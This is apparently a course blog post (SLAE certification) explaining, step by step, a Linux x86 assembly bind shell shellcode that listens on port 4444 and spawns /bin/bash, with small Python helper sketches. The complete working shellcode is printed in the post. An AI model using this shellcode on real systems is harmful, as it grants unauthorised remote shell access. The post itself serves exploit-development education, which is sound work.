Introduction
I wanted to start my adventure with exploit development. First I went to corelan.be, where you can find many fantastic tutorials, but they were too difficult for me to fully understand. Then I found securitytube and its "Securitytube Linux Assembly Expert" (SLAE) course. Although after going through all the available materials I feel more like a beginner than an expert, the course introduces assembly and shellcoding in quite a coherent way. The best motivation is to put some money on a challenge, so I bought the SLAE certification, and to get certified I have to complete some coding tasks. Each task requires me to put its solution on Github and to write a blog post describing it. The first task is to write a bind shell.
Solution
Pseudocode
The shellcode is just a simple program that creates a socket, puts it in a listening state and then runs a shell that a connecting client can interact with. The 'pseudocode' is a simple overview of the program's logical blocks. I did not write a C program at the beginning; in hindsight I regret that decision, and I will solve further tasks by writing the C code first. Example C code can be found e.g. on thegeekstuff.com, although my code is a bit less complicated.
create socket;
prepare structure for binding;
bind socket to a port;
put socket in listening state;
accept incoming connections on socket;
redirect std(in/out/err) to socket;
execve(shell);
Creating socket
; creating SOCKET
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    push eax        ; push 0 (protocol); the stack now contains 0
    mov al, 102     ; eax = 102, the socketcall syscall number
    mov bl, 1       ; ebx = 1 (SYS_SOCKET); the same value is SOCK_STREAM
    push ebx        ; push 1 (SOCK_STREAM); the stack now contains 0 and 1
    mov cl, 2
    push ecx        ; push 2 (AF_INET); the stack now contains 0, 1 and 2
    mov ecx, esp    ; save the pointer to the arguments in ecx
                    ; the arguments were pushed in reverse order (0, 1, 2),
                    ; so popping them would recover the correct order (2, 1, 0)
    int 0x80        ; call socket() through socketcall
    mov esi, eax    ; store socket_file_descriptor in the esi register
For this and the following syscalls, if you want to read more details, try the manual, e.g. man socket. If that shows irrelevant results, ask for section 2 of the manual explicitly, e.g. man 2 accept.
But how do we call socket()? Let's check the manual (man socket):
int socket(int domain, int type, int protocol);
Domain is the protocol family to use. The same manual page shows that for IPv4 it is AF_INET.
Type defines the "communication semantics", which simply means the kind of transport used on top of the domain. As we are interested in TCP, SOCK_STREAM is our choice.
Protocol is generally not used, because it is a mostly theoretical possibility that there is more than one protocol within a domain. For normal use, 0 is the correct value.
The returned value is a socket file descriptor (in Unix everything is a 'file').
Therefore our call is as follows:
sock_file_descriptor = socket(AF_INET, SOCK_STREAM, 0)
The constants used may be found in /usr/include/i386-linux-gnu/bits/socket.h and their respective values are 2 and 1. So our call to socket() should be: sockfd = socket(2, 1, 0);
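The constant values can also be double-checked without reading the headers. A minimal sketch, assuming a Linux machine with Python 3 (Python is used here only for illustration, it is not part of the shellcode, and the variable names are made up for this example):

```python
import socket

# Python exposes the same constants that the C headers define.
# On Linux x86 they are expected to be 2 and 1.
AF_INET_VALUE = int(socket.AF_INET)
SOCK_STREAM_VALUE = int(socket.SOCK_STREAM)

print("AF_INET     =", AF_INET_VALUE)
print("SOCK_STREAM =", SOCK_STREAM_VALUE)
```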
Going back to the code, there are three xors. Each of these instructions puts 0 in a register without having a 0 byte in the resulting machine code, which is very important, as the resulting shellcode cannot contain any NULL bytes.
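To see why xor is preferred, compare the machine code of the obvious alternative. The sketch below hard-codes the 32-bit encodings of three instructions and checks them for zero bytes; the helper name has_null_byte is made up for this illustration.

```python
# Machine code of three x86 instructions in 32-bit mode.
ENCODINGS = {
    "mov eax, 0":   bytes([0xB8, 0x00, 0x00, 0x00, 0x00]),
    "xor eax, eax": bytes([0x31, 0xC0]),
    "mov al, 102":  bytes([0xB0, 0x66]),
}

def has_null_byte(code: bytes) -> bool:
    """Return True if the machine code contains a 0x00 byte."""
    return b"\x00" in code

for text, code in ENCODINGS.items():
    hex_bytes = " ".join("%02x" % b for b in code)
    print("%-14s %-16s null byte: %s" % (text, hex_bytes, has_null_byte(code)))
```

The same reasoning explains why the code writes to al, bl and cl instead of the full 32-bit registers: a small immediate stored in a 32-bit register would be padded with zero bytes.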
Next, the 0 value is pushed onto the stack. Just after that, eax is set to 102, the number of the socketcall syscall through which this code invokes socket() and all the later socket functions. After setting eax, ebx and ecx are set to 1 and 2 respectively and pushed onto the stack. The stack then contains (from the top):
2 |
1 |
0 |
The stack pointer is saved in the ecx register and the syscall is executed through the int 0x80 instruction. The kernel then runs the syscall whose number is in eax, with its arguments in ebx and ecx. Ebx is interesting because it contains the value 1, which is used twice: it was pushed onto the stack as SOCK_STREAM, and it also selects the socket() function, since SYS_SOCKET is defined with the value 1 in /usr/include/linux/net.h. Ecx contains the address of the top of the stack, and popping all the arguments off the stack would yield them in the correct order: 2, 1 and 0.
The result of int 0x80 is the socket file descriptor, which is returned in the eax register. As that register will be used heavily, the value is saved in the esi register.
Bind socket
; opening SOCKET on port 4444
    xor ecx, ecx    ; zero ecx to ease the port number manipulation
    xor edx, edx    ; zero edx to be able to push 0 onto the stack
    push edx        ; INADDR_ANY
    mov cx, 4444
    xchg ch, cl     ; swap the bytes, because htons(port) reverses them
    push ecx
    xor ax, ax
    mov al, 2       ; AF_INET
    push ax         ; ax, not eax, because this field of the structure
                    ; is 16 bits long
                    ; the stack now has (INADDR_ANY, port_no, protocol_family)
    mov ecx, esp    ; save the pointer to the structure in the ecx register
The bind() call requires a special data structure as its argument (see man 2 bind). The value of INADDR_ANY, taken from /usr/include/netinet/in.h, is 0: we want to accept connections on any of the machine's addresses. The structure is built on the stack starting from its end, so we push 0 first. Then the 16-bit port number is put in the cx register. Since the structure requires the port to be the result of htons(port), the next instruction, xchg, swaps its two bytes. After that, ecx is pushed onto the stack.
Finally, the protocol family number (AF_INET) is pushed, so the stack looks as follows:
2 |
4444 |
0 |
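The byte-level result of these three pushes can be modelled outside the assembler. The following is a sketch under the assumption of a little-endian x86 stack; the helpers swap16 and push are made up for this illustration and only mimic what xchg ch, cl and push do to memory.

```python
import struct

def swap16(value: int) -> int:
    """Swap the two bytes of a 16-bit value, like xchg ch, cl."""
    return ((value & 0xFF) << 8) | (value >> 8)

def push(stack: bytes, value: int, size: int) -> bytes:
    """Model an x86 push: the new little-endian bytes land below the old ones."""
    return value.to_bytes(size, "little") + stack

stack = b""
stack = push(stack, 0, 4)              # push edx  (INADDR_ANY)
stack = push(stack, swap16(4444), 4)   # push ecx  (port after xchg ch, cl)
stack = push(stack, 2, 2)              # push ax   (AF_INET, 16 bits)

# The first 8 bytes at esp: sin_family, sin_port, sin_addr
family, port_be, addr = struct.unpack("<H2s4s", stack[:8])
print(stack.hex())
print(family, int.from_bytes(port_be, "big"), addr.hex())
```

Read from the lowest address, the bytes are the family (02 00), the port in network byte order (11 5c) and four zero bytes for the address, which is the beginning of the structure that bind() expects.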
Having the data prepared, it is time to call the bind() syscall:
; calling bind() syscall
; in the file /usr/include/linux/net.h
; the bind call has the value 2
; therefore we should use that value to select the operation
; that we perform on the socket
    mov al, 102     ; eax = 102, the socketcall syscall number
    mov bl, 2       ; socket call type number, 2 = bind
    mov dl, 16      ; size of the sock_address structure
    push edx
    xor edx, edx    ; zeroing again
    push ecx        ; pointer to the structure, created 6 instructions above
    push esi        ; push socket_file_descriptor on the stack
    mov ecx, esp    ; save the pointer to the args in the ecx register
    int 0x80        ; call socket call type bind with the particular port
Again, all the registers need to be initialised with proper values:
eax - 102, the number of the socketcall syscall
ebx - 2, the number of the bind() call in /usr/include/linux/net.h
edx - 16, the size of the structure generated before
Then comes the 'magic': edx, ecx and esi are pushed onto the stack. The stack pointer is copied to ecx, because ecx should contain the pointer to the arguments of the bind() call. These arguments are the file descriptor, the pointer to the address structure and the size of that structure. The last step is obvious: having initialised everything, we execute the syscall for bind().
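The argument block that ecx points to is just three consecutive 32-bit words. A small sketch of that layout follows; the descriptor number and the pointer value are hypothetical, picked only for illustration, and pack_args is a made-up helper name.

```python
import struct

# Call numbers from /usr/include/linux/net.h that are used in this post.
SOCKETCALL = {"socket": 1, "bind": 2, "listen": 4, "accept": 5}

def pack_args(*values: int) -> bytes:
    """Lay out 32-bit arguments the way they sit on the stack at esp."""
    return struct.pack("<%dI" % len(values), *values)

# Hypothetical values, for illustration only.
sockfd = 3
addr_ptr = 0xBFFFF6A0
bind_args = pack_args(sockfd, addr_ptr, 16)

print("ebx =", SOCKETCALL["bind"], "args =", bind_args.hex())
```

The last value pushed (the descriptor) ends up at the lowest address, which is why the arguments are pushed in the order size, pointer, descriptor.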
Putting socket in listening state
    mov al, 102     ; eax = 102, the socketcall syscall number
    mov bl, 4       ; socket call type number, 4 = listen
    push edx        ; backlog (==0)
    push esi        ; push socket_file_descriptor on the stack
    mov ecx, esp    ; save the pointer to the args in the ecx register
    int 0x80
This part is fortunately very short :-) Again we initialise eax with the socketcall syscall number, but now we are calling listen(), represented by the number 4 in `/usr/include/linux/net.h`. The listen() call requires two parameters: the socket file descriptor and something called "backlog", which can be set to 0 and forgotten. Those two values are pushed onto the stack and the pointer to them is stored in ecx. Finally the syscall is executed.
Accepting connections
    mov al, 102     ; eax = 102, the socketcall syscall number
    mov bl, 5       ; socket call type number, 5 = accept
    push edx        ; addrlen
    push edx        ; addr
    push esi        ; push socket_file_descriptor on the stack
    mov ecx, esp    ; save the pointer to the args in the ecx register
    int 0x80
We are almost done with manipulating the socket. The last call is accept(), which has the number 5 in /usr/include/linux/net.h. The accept() call takes three parameters, described in man 2 accept:
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
Since the second and third parameters are not used, they may be 0 (NULL), which makes the call simpler.
Redirect all the basic streams to socket
Having the socket open and ready, you need to remember to redirect all the I/O streams to it to allow the shell to be fully interactive. Dup2 is the syscall that duplicates a file descriptor.
; saving client connection file descriptor
    mov ebx, eax    ; save the incoming connection's file descriptor
    xor ecx, ecx    ; zeroing ecx before the loop
    mov cl, 3       ; counter for the loop
stdloop:
    mov al, 63      ; syscall number of dup2()
    int 0x80
    dec cl          ; decrementing the loop counter
    jns stdloop     ; loop until the sign flag is set (counter below 0)
                    ; it cannot be jnz because we really want
                    ; to execute the loop with the counter at 0
First we need to save the result of the accept() call; we do that in the ebx register. Then we set ecx to 3, which is the loop counter. It counts down from 3 to 0, so the loop body runs four times.
In the loop we first set the dup2 syscall number in eax and then we execute the syscall. After that we decrement the loop counter and test whether it has reached -1. If so, we do not repeat the loop and we go on to executing the shell.
The first call of dup2() takes its parameters from ebx and ecx, and in C it would look like dup2(clientfd, 3), so now file descriptor number 3 is clientfd
The second call of dup2() would look like dup2(clientfd, 2), so clientfd has now replaced stderr
The third call of dup2() would look like dup2(clientfd, 1), so clientfd has now replaced stdout
The fourth call of dup2() would look like dup2(clientfd, 0), so clientfd has now replaced stdin
So clientfd is also saved in descriptor 3, and everything will be redirected to the socket represented by clientfd.
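The behaviour of the counter is easy to get wrong, so here is a small model of the loop. It is only a sketch: dup2_targets is a made-up helper that imitates dec cl and the two conditional jumps on an 8-bit counter, without calling dup2 at all.

```python
def dup2_targets(start: int = 3, jump: str = "jns") -> list:
    """Simulate the stdloop counter and return the dup2 target descriptors."""
    cl = start & 0xFF
    targets = []
    while True:
        targets.append(cl)                # int 0x80 -> dup2(clientfd, cl)
        cl = (cl - 1) & 0xFF              # dec cl (8-bit wrap-around)
        sign_flag = bool(cl & 0x80)       # SF mirrors the top bit of the result
        zero_flag = cl == 0               # ZF is set when the result is 0
        if jump == "jns":
            loop_again = not sign_flag    # jns: jump while SF is clear
        else:
            loop_again = not zero_flag    # jnz: jump while ZF is clear
        if not loop_again:
            return targets

print("jns:", dup2_targets(3, "jns"))
print("jnz:", dup2_targets(3, "jnz"))
```

With jnz the loop would stop before descriptor 0 is handled, so stdin would never be redirected to the socket.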
Execute shell
; all std's have been redirected
; finally - run SHELL
    mov al, 11          ; the syscall number of execve
    push edx            ; push null - the string-terminating character
    push 0x68736162     ; hsab
    push 0x2f6e6962     ; /nib
    push 0x2f2f2f2f     ; ////
    mov ebx, esp        ; store the pointer to the executable's name in ebx
    push edx            ; push null - it terminates the argv array
    push ebx            ; push the pointer to the executable path - the
                        ; first element of argv
    mov ecx, esp        ; save the pointer to argv (pointer to the string
                        ; with the executable + null)
    int 0x80            ; run
                        ; execve("////bin/bash", argv, NULL)
                        ; the last NULL (envp) is in edx
The first thing in this block of code, just after initialising eax with the proper syscall number, is to put some strange fixed values onto the stack. In the code these values are commented with strings which, read backwards, give NULL, 'bash', 'bin/' and '////'. Putting all the values together gives us the path to the executable, written backwards: '////bin/bash'
Why backwards? Because we need them on the stack, which grows towards lower addresses, and this is the simplest way.
You can put any executable name here. Getting those 'strange' numbers (representing the ASCII values of the string's characters) is possible with a script; to ease the task, I have created a simple Python tool, reverse.py.
What is important is that the length of the executable's path should be a multiple of 4. Therefore, if you have a string that is e.g. 9 bytes long, you must somehow extend it to 12 or 16 etc. bytes.
Taking "/bin/bash" as an example, you may add additional '/' characters, resulting in "////bin/bash", which is a 12-byte string. To get the proper hex values just run `python reverse.py "////bin/bash"`
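The reverse.py tool itself is not reproduced in this post. The following is an independent sketch of the same idea, not the tool's actual code: the function name push_values is hypothetical, and the padding step assumes an absolute path, so that extra leading slashes do not change its meaning.

```python
def push_values(path: str) -> list:
    """Return the 32-bit values to push, the last chunk of the path first."""
    data = path.encode("ascii")
    padding = (-len(data)) % 4
    data = b"/" * padding + data      # pad with leading slashes to a multiple of 4
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # Each chunk is read as a little-endian integer, so that the push
    # stores its characters in memory in their original order.
    return ["0x%08x" % int.from_bytes(chunk, "little") for chunk in reversed(chunks)]

for value in push_values("/bin/bash"):
    print("push", value)
```

For "/bin/bash" this yields the three values used in the shellcode, in the order in which they are pushed.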
Wow, that was quite a long explanation, but you should now understand where those 'magic values' came from.
After pushing the string onto the stack, we store the pointer to the string in ebx.
Then we must store the remaining arguments of the execve call in registers:
edx - envp - NULL, we do not want to pass any environment to bash
ecx - argv - pointer to the array containing the address of the executable's name and NULL.
ebx - executable - pointer to the executable's name
And finally the syscall :-)
Basic usage
OK, so cool assembly, but what next? I have created some scripts to ease the process of compiling and testing the shellcode. They are described in README.md on Github; the 'fire and forget' one is go.sh. Running it with the assembly file as an argument will assemble and link the assembly code, and then create and compile a simple C program to test the shellcode (a kind of integration test). For this bind_shell.nasm, the command would be: ./go.sh bind_shell
I hope that if you managed to get here, you understand the shellcode's logic and can now create your own bind shell for Linux.
Mandatory footer to get certified:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: SLAE-769